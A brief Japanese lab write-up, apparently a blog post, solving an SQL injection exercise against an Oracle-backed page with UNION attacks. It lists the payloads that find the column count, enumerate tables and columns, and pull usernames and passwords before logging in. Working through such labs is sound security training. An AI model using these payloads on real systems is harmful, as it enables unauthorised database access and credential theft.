Hello there, ('ω')ノ
SQLインジェクション攻撃、Oracle上のデータベースコンテンツの一覧表示を。
UNION攻撃を使用して他のテーブルからデータを取得できるとのことで。
まずは、ページにアクセスして。
下記のペイロードからカラム数を確定して。
'+UNION+SELECT+'abc','def'+FROM+DUAL--
下記のペイロードからテーブル名を取得して。
ユーザ情報らしきテーブルを見つけ出して。
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
ユーザテーブルからカラムを取得して。
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_NIPDMQ'--
下記のペイロードからパスワードを取得して。
'+UNION+SELECT+USERNAME_TOUUIN,PASSWORD_CBMLDK+FROM+USERS_NIPDMQ--
ログインして。
クリアできた。
Best regards, (^^ゞ
